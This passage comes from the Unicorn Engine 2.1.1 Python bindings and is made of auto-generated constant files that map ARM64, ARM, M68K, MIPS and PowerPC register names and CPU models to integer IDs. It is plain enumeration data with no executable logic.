108 UC_ARM64_REG_Q5 = 109 UC_ARM64_REG_Q6 = 110 UC_ARM64_REG_Q7 = 111 UC_ARM64_REG_Q8 = 112 UC_ARM64_REG_Q9 = 113 UC_ARM64_REG_Q10 = 114 UC_ARM64_REG_Q11 = 115 UC_ARM64_REG_Q12 = 116 UC_ARM64_REG_Q13 = 117 UC_ARM64_REG_Q14 = 118 UC_ARM64_REG_Q15 = 119 UC_ARM64_REG_Q16 = 120 UC_ARM64_REG_Q17 = 121 UC_ARM64_REG_Q18 = 122 UC_ARM64_REG_Q19 = 123 UC_ARM64_REG_Q20 = 124 UC_ARM64_REG_Q21 = 125 UC_ARM64_REG_Q22 = 126 UC_ARM64_REG_Q23 = 127 UC_ARM64_REG_Q24 = 128 UC_ARM64_REG_Q25 = 129 UC_ARM64_REG_Q26 = 130 UC_ARM64_REG_Q27 = 131 UC_ARM64_REG_Q28 = 132 UC_ARM64_REG_Q29 = 133 UC_ARM64_REG_Q30 = 134 UC_ARM64_REG_Q31 = 135 UC_ARM64_REG_S0 = 136 UC_ARM64_REG_S1 = 137 UC_ARM64_REG_S2 = 138 UC_ARM64_REG_S3 = 139 UC_ARM64_REG_S4 = 140 UC_ARM64_REG_S5 = 141 UC_ARM64_REG_S6 = 142 UC_ARM64_REG_S7 = 143 UC_ARM64_REG_S8 = 144 UC_ARM64_REG_S9 = 145 UC_ARM64_REG_S10 = 146 UC_ARM64_REG_S11 = 147 UC_ARM64_REG_S12 = 148 UC_ARM64_REG_S13 = 149 UC_ARM64_REG_S14 = 150 UC_ARM64_REG_S15 = 151 UC_ARM64_REG_S16 = 152 UC_ARM64_REG_S17 = 153 UC_ARM64_REG_S18 = 154 UC_ARM64_REG_S19 = 155 UC_ARM64_REG_S20 = 156 UC_ARM64_REG_S21 = 157 UC_ARM64_REG_S22 = 158 UC_ARM64_REG_S23 = 159 UC_ARM64_REG_S24 = 160 UC_ARM64_REG_S25 = 161 UC_ARM64_REG_S26 = 162 UC_ARM64_REG_S27 = 163 UC_ARM64_REG_S28 = 164 UC_ARM64_REG_S29 = 165 UC_ARM64_REG_S30 = 166 UC_ARM64_REG_S31 = 167 UC_ARM64_REG_W0 = 168 UC_ARM64_REG_W1 = 169 UC_ARM64_REG_W2 = 170 UC_ARM64_REG_W3 = 171 UC_ARM64_REG_W4 = 172 UC_ARM64_REG_W5 = 173 UC_ARM64_REG_W6 = 174 UC_ARM64_REG_W7 = 175 UC_ARM64_REG_W8 = 176 UC_ARM64_REG_W9 = 177 UC_ARM64_REG_W10 = 178 UC_ARM64_REG_W11 = 179 UC_ARM64_REG_W12 = 180 UC_ARM64_REG_W13 = 181 UC_ARM64_REG_W14 = 182 UC_ARM64_REG_W15 = 183 UC_ARM64_REG_W16 = 184 UC_ARM64_REG_W17 = 185 UC_ARM64_REG_W18 = 186 UC_ARM64_REG_W19 = 187 UC_ARM64_REG_W20 = 188 UC_ARM64_REG_W21 = 189 UC_ARM64_REG_W22 = 190 UC_ARM64_REG_W23 = 191 UC_ARM64_REG_W24 = 192 UC_ARM64_REG_W25 = 193 UC_ARM64_REG_W26 = 194 UC_ARM64_REG_W27 = 195 UC_ARM64_REG_W28 = 196 UC_ARM64_REG_W29 = 197 UC_ARM64_REG_W30 = 198 UC_ARM64_REG_X0 = 199 UC_ARM64_REG_X1 = 200 UC_ARM64_REG_X2 = 201 UC_ARM64_REG_X3 = 202 UC_ARM64_REG_X4 = 203 UC_ARM64_REG_X5 = 204 UC_ARM64_REG_X6 = 205 UC_ARM64_REG_X7 = 206 UC_ARM64_REG_X8 = 207 UC_ARM64_REG_X9 = 208 UC_ARM64_REG_X10 = 209 UC_ARM64_REG_X11 = 210 UC_ARM64_REG_X12 = 211 UC_ARM64_REG_X13 = 212 UC_ARM64_REG_X14 = 213 UC_ARM64_REG_X15 = 214 UC_ARM64_REG_X16 = 215 UC_ARM64_REG_X17 = 216 UC_ARM64_REG_X18 = 217 UC_ARM64_REG_X19 = 218 UC_ARM64_REG_X20 = 219 UC_ARM64_REG_X21 = 220 UC_ARM64_REG_X22 = 221 UC_ARM64_REG_X23 = 222 UC_ARM64_REG_X24 = 223 UC_ARM64_REG_X25 = 224 UC_ARM64_REG_X26 = 225 UC_ARM64_REG_X27 = 226 UC_ARM64_REG_X28 = 227 UC_ARM64_REG_V0 = 228 UC_ARM64_REG_V1 = 229 UC_ARM64_REG_V2 = 230 UC_ARM64_REG_V3 = 231 UC_ARM64_REG_V4 = 232 UC_ARM64_REG_V5 = 233 UC_ARM64_REG_V6 = 234 UC_ARM64_REG_V7 = 235 UC_ARM64_REG_V8 = 236 UC_ARM64_REG_V9 = 237 UC_ARM64_REG_V10 = 238 UC_ARM64_REG_V11 = 239 UC_ARM64_REG_V12 = 240 UC_ARM64_REG_V13 = 241 UC_ARM64_REG_V14 = 242 UC_ARM64_REG_V15 = 243 UC_ARM64_REG_V16 = 244 UC_ARM64_REG_V17 = 245 UC_ARM64_REG_V18 = 246 UC_ARM64_REG_V19 = 247 UC_ARM64_REG_V20 = 248 UC_ARM64_REG_V21 = 249 UC_ARM64_REG_V22 = 250 UC_ARM64_REG_V23 = 251 UC_ARM64_REG_V24 = 252 UC_ARM64_REG_V25 = 253 UC_ARM64_REG_V26 = 254 UC_ARM64_REG_V27 = 255 UC_ARM64_REG_V28 = 256 UC_ARM64_REG_V29 = 257 UC_ARM64_REG_V30 = 258 UC_ARM64_REG_V31 = 259 # pseudo registers UC_ARM64_REG_PC = 260 UC_ARM64_REG_CPACR_EL1 = 261 # thread registers, depreciated, use 
UC_ARM64_REG_CP_REG instead UC_ARM64_REG_TPIDR_EL0 = 262 UC_ARM64_REG_TPIDRRO_EL0 = 263 UC_ARM64_REG_TPIDR_EL1 = 264 UC_ARM64_REG_PSTATE = 265
# exception link registers, depreciated, use UC_ARM64_REG_CP_REG instead
UC_ARM64_REG_ELR_EL0 = 266 UC_ARM64_REG_ELR_EL1 = 267 UC_ARM64_REG_ELR_EL2 = 268 UC_ARM64_REG_ELR_EL3 = 269
# stack pointers registers, depreciated, use UC_ARM64_REG_CP_REG instead
UC_ARM64_REG_SP_EL0 = 270 UC_ARM64_REG_SP_EL1 = 271 UC_ARM64_REG_SP_EL2 = 272 UC_ARM64_REG_SP_EL3 = 273
# other CP15 registers, depreciated, use UC_ARM64_REG_CP_REG instead
UC_ARM64_REG_TTBR0_EL1 = 274 UC_ARM64_REG_TTBR1_EL1 = 275 UC_ARM64_REG_ESR_EL0 = 276 UC_ARM64_REG_ESR_EL1 = 277 UC_ARM64_REG_ESR_EL2 = 278 UC_ARM64_REG_ESR_EL3 = 279 UC_ARM64_REG_FAR_EL0 = 280 UC_ARM64_REG_FAR_EL1 = 281 UC_ARM64_REG_FAR_EL2 = 282 UC_ARM64_REG_FAR_EL3 = 283 UC_ARM64_REG_PAR_EL1 = 284 UC_ARM64_REG_MAIR_EL1 = 285 UC_ARM64_REG_VBAR_EL0 = 286 UC_ARM64_REG_VBAR_EL1 = 287 UC_ARM64_REG_VBAR_EL2 = 288 UC_ARM64_REG_VBAR_EL3 = 289 UC_ARM64_REG_CP_REG = 290
# floating point control and status registers
UC_ARM64_REG_FPCR = 291 UC_ARM64_REG_FPSR = 292 UC_ARM64_REG_ENDING = 293
# alias registers
UC_ARM64_REG_IP0 = 215 UC_ARM64_REG_IP1 = 216 UC_ARM64_REG_FP = 1 UC_ARM64_REG_LR = 2
# ARM64 instructions
UC_ARM64_INS_INVALID = 0 UC_ARM64_INS_MRS = 1 UC_ARM64_INS_MSR = 2 UC_ARM64_INS_SYS = 3 UC_ARM64_INS_SYSL = 4 UC_ARM64_INS_ENDING = 5

unicorn-2.1.1/bindings/python/unicorn/arm_const.py

# For Unicorn Engine.
AUTO-GENERATED FILE, DO NOT EDIT [arm_const.py] # ARM CPU UC_CPU_ARM_926 = 0 UC_CPU_ARM_946 = 1 UC_CPU_ARM_1026 = 2 UC_CPU_ARM_1136_R2 = 3 UC_CPU_ARM_1136 = 4 UC_CPU_ARM_1176 = 5 UC_CPU_ARM_11MPCORE = 6 UC_CPU_ARM_CORTEX_M0 = 7 UC_CPU_ARM_CORTEX_M3 = 8 UC_CPU_ARM_CORTEX_M4 = 9 UC_CPU_ARM_CORTEX_M7 = 10 UC_CPU_ARM_CORTEX_M33 = 11 UC_CPU_ARM_CORTEX_R5 = 12 UC_CPU_ARM_CORTEX_R5F = 13 UC_CPU_ARM_CORTEX_A7 = 14 UC_CPU_ARM_CORTEX_A8 = 15 UC_CPU_ARM_CORTEX_A9 = 16 UC_CPU_ARM_CORTEX_A15 = 17 UC_CPU_ARM_TI925T = 18 UC_CPU_ARM_SA1100 = 19 UC_CPU_ARM_SA1110 = 20 UC_CPU_ARM_PXA250 = 21 UC_CPU_ARM_PXA255 = 22 UC_CPU_ARM_PXA260 = 23 UC_CPU_ARM_PXA261 = 24 UC_CPU_ARM_PXA262 = 25 UC_CPU_ARM_PXA270 = 26 UC_CPU_ARM_PXA270A0 = 27 UC_CPU_ARM_PXA270A1 = 28 UC_CPU_ARM_PXA270B0 = 29 UC_CPU_ARM_PXA270B1 = 30 UC_CPU_ARM_PXA270C0 = 31 UC_CPU_ARM_PXA270C5 = 32 UC_CPU_ARM_MAX = 33 UC_CPU_ARM_ENDING = 34 # ARM registers UC_ARM_REG_INVALID = 0 UC_ARM_REG_APSR = 1 UC_ARM_REG_APSR_NZCV = 2 UC_ARM_REG_CPSR = 3 UC_ARM_REG_FPEXC = 4 UC_ARM_REG_FPINST = 5 UC_ARM_REG_FPSCR = 6 UC_ARM_REG_FPSCR_NZCV = 7 UC_ARM_REG_FPSID = 8 UC_ARM_REG_ITSTATE = 9 UC_ARM_REG_LR = 10 UC_ARM_REG_PC = 11 UC_ARM_REG_SP = 12 UC_ARM_REG_SPSR = 13 UC_ARM_REG_D0 = 14 UC_ARM_REG_D1 = 15 UC_ARM_REG_D2 = 16 UC_ARM_REG_D3 = 17 UC_ARM_REG_D4 = 18 UC_ARM_REG_D5 = 19 UC_ARM_REG_D6 = 20 UC_ARM_REG_D7 = 21 UC_ARM_REG_D8 = 22 UC_ARM_REG_D9 = 23 UC_ARM_REG_D10 = 24 UC_ARM_REG_D11 = 25 UC_ARM_REG_D12 = 26 UC_ARM_REG_D13 = 27 UC_ARM_REG_D14 = 28 UC_ARM_REG_D15 = 29 UC_ARM_REG_D16 = 30 UC_ARM_REG_D17 = 31 UC_ARM_REG_D18 = 32 UC_ARM_REG_D19 = 33 UC_ARM_REG_D20 = 34 UC_ARM_REG_D21 = 35 UC_ARM_REG_D22 = 36 UC_ARM_REG_D23 = 37 UC_ARM_REG_D24 = 38 UC_ARM_REG_D25 = 39 UC_ARM_REG_D26 = 40 UC_ARM_REG_D27 = 41 UC_ARM_REG_D28 = 42 UC_ARM_REG_D29 = 43 UC_ARM_REG_D30 = 44 UC_ARM_REG_D31 = 45 UC_ARM_REG_FPINST2 = 46 UC_ARM_REG_MVFR0 = 47 UC_ARM_REG_MVFR1 = 48 UC_ARM_REG_MVFR2 = 49 UC_ARM_REG_Q0 = 50 UC_ARM_REG_Q1 = 51 UC_ARM_REG_Q2 = 52 UC_ARM_REG_Q3 = 53 UC_ARM_REG_Q4 = 54 UC_ARM_REG_Q5 = 55 UC_ARM_REG_Q6 = 56 UC_ARM_REG_Q7 = 57 UC_ARM_REG_Q8 = 58 UC_ARM_REG_Q9 = 59 UC_ARM_REG_Q10 = 60 UC_ARM_REG_Q11 = 61 UC_ARM_REG_Q12 = 62 UC_ARM_REG_Q13 = 63 UC_ARM_REG_Q14 = 64 UC_ARM_REG_Q15 = 65 UC_ARM_REG_R0 = 66 UC_ARM_REG_R1 = 67 UC_ARM_REG_R2 = 68 UC_ARM_REG_R3 = 69 UC_ARM_REG_R4 = 70 UC_ARM_REG_R5 = 71 UC_ARM_REG_R6 = 72 UC_ARM_REG_R7 = 73 UC_ARM_REG_R8 = 74 UC_ARM_REG_R9 = 75 UC_ARM_REG_R10 = 76 UC_ARM_REG_R11 = 77 UC_ARM_REG_R12 = 78 UC_ARM_REG_S0 = 79 UC_ARM_REG_S1 = 80 UC_ARM_REG_S2 = 81 UC_ARM_REG_S3 = 82 UC_ARM_REG_S4 = 83 UC_ARM_REG_S5 = 84 UC_ARM_REG_S6 = 85 UC_ARM_REG_S7 = 86 UC_ARM_REG_S8 = 87 UC_ARM_REG_S9 = 88 UC_ARM_REG_S10 = 89 UC_ARM_REG_S11 = 90 UC_ARM_REG_S12 = 91 UC_ARM_REG_S13 = 92 UC_ARM_REG_S14 = 93 UC_ARM_REG_S15 = 94 UC_ARM_REG_S16 = 95 UC_ARM_REG_S17 = 96 UC_ARM_REG_S18 = 97 UC_ARM_REG_S19 = 98 UC_ARM_REG_S20 = 99 UC_ARM_REG_S21 = 100 UC_ARM_REG_S22 = 101 UC_ARM_REG_S23 = 102 UC_ARM_REG_S24 = 103 UC_ARM_REG_S25 = 104 UC_ARM_REG_S26 = 105 UC_ARM_REG_S27 = 106 UC_ARM_REG_S28 = 107 UC_ARM_REG_S29 = 108 UC_ARM_REG_S30 = 109 UC_ARM_REG_S31 = 110 UC_ARM_REG_C1_C0_2 = 111 UC_ARM_REG_C13_C0_2 = 112 UC_ARM_REG_C13_C0_3 = 113 UC_ARM_REG_IPSR = 114 UC_ARM_REG_MSP = 115 UC_ARM_REG_PSP = 116 UC_ARM_REG_CONTROL = 117 UC_ARM_REG_IAPSR = 118 UC_ARM_REG_EAPSR = 119 UC_ARM_REG_XPSR = 120 UC_ARM_REG_EPSR = 121 UC_ARM_REG_IEPSR = 122 UC_ARM_REG_PRIMASK = 123 UC_ARM_REG_BASEPRI = 124 UC_ARM_REG_BASEPRI_MAX = 125 UC_ARM_REG_FAULTMASK = 126 UC_ARM_REG_APSR_NZCVQ = 127 
UC_ARM_REG_APSR_G = 128 UC_ARM_REG_APSR_NZCVQG = 129 UC_ARM_REG_IAPSR_NZCVQ = 130 UC_ARM_REG_IAPSR_G = 131 UC_ARM_REG_IAPSR_NZCVQG = 132 UC_ARM_REG_EAPSR_NZCVQ = 133 UC_ARM_REG_EAPSR_G = 134 UC_ARM_REG_EAPSR_NZCVQG = 135 UC_ARM_REG_XPSR_NZCVQ = 136 UC_ARM_REG_XPSR_G = 137 UC_ARM_REG_XPSR_NZCVQG = 138 UC_ARM_REG_CP_REG = 139 UC_ARM_REG_ENDING = 140
# alias registers
UC_ARM_REG_R13 = 12 UC_ARM_REG_R14 = 10 UC_ARM_REG_R15 = 11 UC_ARM_REG_SB = 75 UC_ARM_REG_SL = 76 UC_ARM_REG_FP = 77 UC_ARM_REG_IP = 78

unicorn-2.1.1/bindings/python/unicorn/m68k_const.py

# For Unicorn Engine. AUTO-GENERATED FILE, DO NOT EDIT [m68k_const.py]

# M68K CPU
UC_CPU_M68K_M5206 = 0 UC_CPU_M68K_M68000 = 1 UC_CPU_M68K_M68020 = 2 UC_CPU_M68K_M68030 = 3 UC_CPU_M68K_M68040 = 4 UC_CPU_M68K_M68060 = 5 UC_CPU_M68K_M5208 = 6 UC_CPU_M68K_CFV4E = 7 UC_CPU_M68K_ANY = 8 UC_CPU_M68K_ENDING = 9
# M68K registers
UC_M68K_REG_INVALID = 0 UC_M68K_REG_A0 = 1 UC_M68K_REG_A1 = 2 UC_M68K_REG_A2 = 3 UC_M68K_REG_A3 = 4 UC_M68K_REG_A4 = 5 UC_M68K_REG_A5 = 6 UC_M68K_REG_A6 = 7 UC_M68K_REG_A7 = 8 UC_M68K_REG_D0 = 9 UC_M68K_REG_D1 = 10 UC_M68K_REG_D2 = 11 UC_M68K_REG_D3 = 12 UC_M68K_REG_D4 = 13 UC_M68K_REG_D5 = 14 UC_M68K_REG_D6 = 15 UC_M68K_REG_D7 = 16 UC_M68K_REG_SR = 17 UC_M68K_REG_PC = 18 UC_M68K_REG_ENDING = 19

unicorn-2.1.1/bindings/python/unicorn/mips_const.py

# For Unicorn Engine.
AUTO-GENERATED FILE, DO NOT EDIT [mips_const.py] # MIPS32 CPUS UC_CPU_MIPS32_4KC = 0 UC_CPU_MIPS32_4KM = 1 UC_CPU_MIPS32_4KECR1 = 2 UC_CPU_MIPS32_4KEMR1 = 3 UC_CPU_MIPS32_4KEC = 4 UC_CPU_MIPS32_4KEM = 5 UC_CPU_MIPS32_24KC = 6 UC_CPU_MIPS32_24KEC = 7 UC_CPU_MIPS32_24KF = 8 UC_CPU_MIPS32_34KF = 9 UC_CPU_MIPS32_74KF = 10 UC_CPU_MIPS32_M14K = 11 UC_CPU_MIPS32_M14KC = 12 UC_CPU_MIPS32_P5600 = 13 UC_CPU_MIPS32_MIPS32R6_GENERIC = 14 UC_CPU_MIPS32_I7200 = 15 UC_CPU_MIPS32_ENDING = 16 # MIPS64 CPUS UC_CPU_MIPS64_R4000 = 0 UC_CPU_MIPS64_VR5432 = 1 UC_CPU_MIPS64_5KC = 2 UC_CPU_MIPS64_5KF = 3 UC_CPU_MIPS64_20KC = 4 UC_CPU_MIPS64_MIPS64R2_GENERIC = 5 UC_CPU_MIPS64_5KEC = 6 UC_CPU_MIPS64_5KEF = 7 UC_CPU_MIPS64_I6400 = 8 UC_CPU_MIPS64_I6500 = 9 UC_CPU_MIPS64_LOONGSON_2E = 10 UC_CPU_MIPS64_LOONGSON_2F = 11 UC_CPU_MIPS64_MIPS64DSPR2 = 12 UC_CPU_MIPS64_ENDING = 13 # MIPS registers UC_MIPS_REG_INVALID = 0 # General purpose registers UC_MIPS_REG_PC = 1 UC_MIPS_REG_0 = 2 UC_MIPS_REG_1 = 3 UC_MIPS_REG_2 = 4 UC_MIPS_REG_3 = 5 UC_MIPS_REG_4 = 6 UC_MIPS_REG_5 = 7 UC_MIPS_REG_6 = 8 UC_MIPS_REG_7 = 9 UC_MIPS_REG_8 = 10 UC_MIPS_REG_9 = 11 UC_MIPS_REG_10 = 12 UC_MIPS_REG_11 = 13 UC_MIPS_REG_12 = 14 UC_MIPS_REG_13 = 15 UC_MIPS_REG_14 = 16 UC_MIPS_REG_15 = 17 UC_MIPS_REG_16 = 18 UC_MIPS_REG_17 = 19 UC_MIPS_REG_18 = 20 UC_MIPS_REG_19 = 21 UC_MIPS_REG_20 = 22 UC_MIPS_REG_21 = 23 UC_MIPS_REG_22 = 24 UC_MIPS_REG_23 = 25 UC_MIPS_REG_24 = 26 UC_MIPS_REG_25 = 27 UC_MIPS_REG_26 = 28 UC_MIPS_REG_27 = 29 UC_MIPS_REG_28 = 30 UC_MIPS_REG_29 = 31 UC_MIPS_REG_30 = 32 UC_MIPS_REG_31 = 33 # DSP registers UC_MIPS_REG_DSPCCOND = 34 UC_MIPS_REG_DSPCARRY = 35 UC_MIPS_REG_DSPEFI = 36 UC_MIPS_REG_DSPOUTFLAG = 37 UC_MIPS_REG_DSPOUTFLAG16_19 = 38 UC_MIPS_REG_DSPOUTFLAG20 = 39 UC_MIPS_REG_DSPOUTFLAG21 = 40 UC_MIPS_REG_DSPOUTFLAG22 = 41 UC_MIPS_REG_DSPOUTFLAG23 = 42 UC_MIPS_REG_DSPPOS = 43 UC_MIPS_REG_DSPSCOUNT = 44 # ACC registers UC_MIPS_REG_AC0 = 45 UC_MIPS_REG_AC1 = 46 UC_MIPS_REG_AC2 = 47 UC_MIPS_REG_AC3 = 48 # COP registers UC_MIPS_REG_CC0 = 49 UC_MIPS_REG_CC1 = 50 UC_MIPS_REG_CC2 = 51 UC_MIPS_REG_CC3 = 52 UC_MIPS_REG_CC4 = 53 UC_MIPS_REG_CC5 = 54 UC_MIPS_REG_CC6 = 55 UC_MIPS_REG_CC7 = 56 # FPU registers UC_MIPS_REG_F0 = 57 UC_MIPS_REG_F1 = 58 UC_MIPS_REG_F2 = 59 UC_MIPS_REG_F3 = 60 UC_MIPS_REG_F4 = 61 UC_MIPS_REG_F5 = 62 UC_MIPS_REG_F6 = 63 UC_MIPS_REG_F7 = 64 UC_MIPS_REG_F8 = 65 UC_MIPS_REG_F9 = 66 UC_MIPS_REG_F10 = 67 UC_MIPS_REG_F11 = 68 UC_MIPS_REG_F12 = 69 UC_MIPS_REG_F13 = 70 UC_MIPS_REG_F14 = 71 UC_MIPS_REG_F15 = 72 UC_MIPS_REG_F16 = 73 UC_MIPS_REG_F17 = 74 UC_MIPS_REG_F18 = 75 UC_MIPS_REG_F19 = 76 UC_MIPS_REG_F20 = 77 UC_MIPS_REG_F21 = 78 UC_MIPS_REG_F22 = 79 UC_MIPS_REG_F23 = 80 UC_MIPS_REG_F24 = 81 UC_MIPS_REG_F25 = 82 UC_MIPS_REG_F26 = 83 UC_MIPS_REG_F27 = 84 UC_MIPS_REG_F28 = 85 UC_MIPS_REG_F29 = 86 UC_MIPS_REG_F30 = 87 UC_MIPS_REG_F31 = 88 UC_MIPS_REG_FCC0 = 89 UC_MIPS_REG_FCC1 = 90 UC_MIPS_REG_FCC2 = 91 UC_MIPS_REG_FCC3 = 92 UC_MIPS_REG_FCC4 = 93 UC_MIPS_REG_FCC5 = 94 UC_MIPS_REG_FCC6 = 95 UC_MIPS_REG_FCC7 = 96 # AFPR128 UC_MIPS_REG_W0 = 97 UC_MIPS_REG_W1 = 98 UC_MIPS_REG_W2 = 99 UC_MIPS_REG_W3 = 100 UC_MIPS_REG_W4 = 101 UC_MIPS_REG_W5 = 102 UC_MIPS_REG_W6 = 103 UC_MIPS_REG_W7 = 104 UC_MIPS_REG_W8 = 105 UC_MIPS_REG_W9 = 106 UC_MIPS_REG_W10 = 107 UC_MIPS_REG_W11 = 108 UC_MIPS_REG_W12 = 109 UC_MIPS_REG_W13 = 110 UC_MIPS_REG_W14 = 111 UC_MIPS_REG_W15 = 112 UC_MIPS_REG_W16 = 113 UC_MIPS_REG_W17 = 114 UC_MIPS_REG_W18 = 115 UC_MIPS_REG_W19 = 116 UC_MIPS_REG_W20 = 117 UC_MIPS_REG_W21 = 118 UC_MIPS_REG_W22 = 119 UC_MIPS_REG_W23 = 
120 UC_MIPS_REG_W24 = 121 UC_MIPS_REG_W25 = 122 UC_MIPS_REG_W26 = 123 UC_MIPS_REG_W27 = 124 UC_MIPS_REG_W28 = 125 UC_MIPS_REG_W29 = 126 UC_MIPS_REG_W30 = 127 UC_MIPS_REG_W31 = 128 UC_MIPS_REG_HI = 129 UC_MIPS_REG_LO = 130 UC_MIPS_REG_P0 = 131 UC_MIPS_REG_P1 = 132 UC_MIPS_REG_P2 = 133 UC_MIPS_REG_MPL0 = 134 UC_MIPS_REG_MPL1 = 135 UC_MIPS_REG_MPL2 = 136 UC_MIPS_REG_CP0_CONFIG3 = 137 UC_MIPS_REG_CP0_USERLOCAL = 138 UC_MIPS_REG_CP0_STATUS = 139 UC_MIPS_REG_ENDING = 140
UC_MIPS_REG_ZERO = 2 UC_MIPS_REG_AT = 3 UC_MIPS_REG_V0 = 4 UC_MIPS_REG_V1 = 5 UC_MIPS_REG_A0 = 6 UC_MIPS_REG_A1 = 7 UC_MIPS_REG_A2 = 8 UC_MIPS_REG_A3 = 9 UC_MIPS_REG_T0 = 10 UC_MIPS_REG_T1 = 11 UC_MIPS_REG_T2 = 12 UC_MIPS_REG_T3 = 13 UC_MIPS_REG_T4 = 14 UC_MIPS_REG_T5 = 15 UC_MIPS_REG_T6 = 16 UC_MIPS_REG_T7 = 17 UC_MIPS_REG_S0 = 18 UC_MIPS_REG_S1 = 19 UC_MIPS_REG_S2 = 20 UC_MIPS_REG_S3 = 21 UC_MIPS_REG_S4 = 22 UC_MIPS_REG_S5 = 23 UC_MIPS_REG_S6 = 24 UC_MIPS_REG_S7 = 25 UC_MIPS_REG_T8 = 26 UC_MIPS_REG_T9 = 27 UC_MIPS_REG_K0 = 28 UC_MIPS_REG_K1 = 29 UC_MIPS_REG_GP = 30 UC_MIPS_REG_SP = 31 UC_MIPS_REG_FP = 32 UC_MIPS_REG_S8 = 32 UC_MIPS_REG_RA = 33 UC_MIPS_REG_HI0 = 45 UC_MIPS_REG_HI1 = 46 UC_MIPS_REG_HI2 = 47 UC_MIPS_REG_HI3 = 48 UC_MIPS_REG_LO0 = 45 UC_MIPS_REG_LO1 = 46 UC_MIPS_REG_LO2 = 47 UC_MIPS_REG_LO3 = 48

unicorn-2.1.1/bindings/python/unicorn/ppc_const.py

# For Unicorn Engine.
AUTO-GENERATED FILE, DO NOT EDIT [ppc_const.py] # PPC CPU UC_CPU_PPC32_401 = 0 UC_CPU_PPC32_401A1 = 1 UC_CPU_PPC32_401B2 = 2 UC_CPU_PPC32_401C2 = 3 UC_CPU_PPC32_401D2 = 4 UC_CPU_PPC32_401E2 = 5 UC_CPU_PPC32_401F2 = 6 UC_CPU_PPC32_401G2 = 7 UC_CPU_PPC32_IOP480 = 8 UC_CPU_PPC32_COBRA = 9 UC_CPU_PPC32_403GA = 10 UC_CPU_PPC32_403GB = 11 UC_CPU_PPC32_403GC = 12 UC_CPU_PPC32_403GCX = 13 UC_CPU_PPC32_405D2 = 14 UC_CPU_PPC32_405D4 = 15 UC_CPU_PPC32_405CRA = 16 UC_CPU_PPC32_405CRB = 17 UC_CPU_PPC32_405CRC = 18 UC_CPU_PPC32_405EP = 19 UC_CPU_PPC32_405EZ = 20 UC_CPU_PPC32_405GPA = 21 UC_CPU_PPC32_405GPB = 22 UC_CPU_PPC32_405GPC = 23 UC_CPU_PPC32_405GPD = 24 UC_CPU_PPC32_405GPR = 25 UC_CPU_PPC32_405LP = 26 UC_CPU_PPC32_NPE405H = 27 UC_CPU_PPC32_NPE405H2 = 28 UC_CPU_PPC32_NPE405L = 29 UC_CPU_PPC32_NPE4GS3 = 30 UC_CPU_PPC32_STB03 = 31 UC_CPU_PPC32_STB04 = 32 UC_CPU_PPC32_STB25 = 33 UC_CPU_PPC32_X2VP4 = 34 UC_CPU_PPC32_X2VP20 = 35 UC_CPU_PPC32_440_XILINX = 36 UC_CPU_PPC32_440_XILINX_W_DFPU = 37 UC_CPU_PPC32_440EPA = 38 UC_CPU_PPC32_440EPB = 39 UC_CPU_PPC32_440EPX = 40 UC_CPU_PPC32_460EXB = 41 UC_CPU_PPC32_G2 = 42 UC_CPU_PPC32_G2H4 = 43 UC_CPU_PPC32_G2GP = 44 UC_CPU_PPC32_G2LS = 45 UC_CPU_PPC32_G2HIP3 = 46 UC_CPU_PPC32_G2HIP4 = 47 UC_CPU_PPC32_MPC603 = 48 UC_CPU_PPC32_G2LE = 49 UC_CPU_PPC32_G2LEGP = 50 UC_CPU_PPC32_G2LELS = 51 UC_CPU_PPC32_G2LEGP1 = 52 UC_CPU_PPC32_G2LEGP3 = 53 UC_CPU_PPC32_MPC5200_V10 = 54 UC_CPU_PPC32_MPC5200_V11 = 55 UC_CPU_PPC32_MPC5200_V12 = 56 UC_CPU_PPC32_MPC5200B_V20 = 57 UC_CPU_PPC32_MPC5200B_V21 = 58 UC_CPU_PPC32_E200Z5 = 59 UC_CPU_PPC32_E200Z6 = 60 UC_CPU_PPC32_E300C1 = 61 UC_CPU_PPC32_E300C2 = 62 UC_CPU_PPC32_E300C3 = 63 UC_CPU_PPC32_E300C4 = 64 UC_CPU_PPC32_MPC8343 = 65 UC_CPU_PPC32_MPC8343A = 66 UC_CPU_PPC32_MPC8343E = 67 UC_CPU_PPC32_MPC8343EA = 68 UC_CPU_PPC32_MPC8347T = 69 UC_CPU_PPC32_MPC8347P = 70 UC_CPU_PPC32_MPC8347AT = 71 UC_CPU_PPC32_MPC8347AP = 72 UC_CPU_PPC32_MPC8347ET = 73 UC_CPU_PPC32_MPC8347EP = 74 UC_CPU_PPC32_MPC8347EAT = 75 UC_CPU_PPC32_MPC8347EAP = 76 UC_CPU_PPC32_MPC8349 = 77 UC_CPU_PPC32_MPC8349A = 78 UC_CPU_PPC32_MPC8349E = 79 UC_CPU_PPC32_MPC8349EA = 80 UC_CPU_PPC32_MPC8377 = 81 UC_CPU_PPC32_MPC8377E = 82 UC_CPU_PPC32_MPC8378 = 83 UC_CPU_PPC32_MPC8378E = 84 UC_CPU_PPC32_MPC8379 = 85 UC_CPU_PPC32_MPC8379E = 86 UC_CPU_PPC32_E500_V10 = 87 UC_CPU_PPC32_E500_V20 = 88 UC_CPU_PPC32_E500V2_V10 = 89 UC_CPU_PPC32_E500V2_V20 = 90 UC_CPU_PPC32_E500V2_V21 = 91 UC_CPU_PPC32_E500V2_V22 = 92 UC_CPU_PPC32_E500V2_V30 = 93 UC_CPU_PPC32_E500MC = 94 UC_CPU_PPC32_MPC8533_V10 = 95 UC_CPU_PPC32_MPC8533_V11 = 96 UC_CPU_PPC32_MPC8533E_V10 = 97 UC_CPU_PPC32_MPC8533E_V11 = 98 UC_CPU_PPC32_MPC8540_V10 = 99 UC_CPU_PPC32_MPC8540_V20 = 100 UC_CPU_PPC32_MPC8540_V21 = 101 UC_CPU_PPC32_MPC8541_V10 = 102 UC_CPU_PPC32_MPC8541_V11 = 103 UC_CPU_PPC32_MPC8541E_V10 = 104 UC_CPU_PPC32_MPC8541E_V11 = 105 UC_CPU_PPC32_MPC8543_V10 = 106 UC_CPU_PPC32_MPC8543_V11 = 107 UC_CPU_PPC32_MPC8543_V20 = 108 UC_CPU_PPC32_MPC8543_V21 = 109 UC_CPU_PPC32_MPC8543E_V10 = 110 UC_CPU_PPC32_MPC8543E_V11 = 111 UC_CPU_PPC32_MPC8543E_V20 = 112 UC_CPU_PPC32_MPC8543E_V21 = 113 UC_CPU_PPC32_MPC8544_V10 = 114 UC_CPU_PPC32_MPC8544_V11 = 115 UC_CPU_PPC32_MPC8544E_V10 = 116 UC_CPU_PPC32_MPC8544E_V11 = 117 UC_CPU_PPC32_MPC8545_V20 = 118 UC_CPU_PPC32_MPC8545_V21 = 119 UC_CPU_PPC32_MPC8545E_V20 = 120 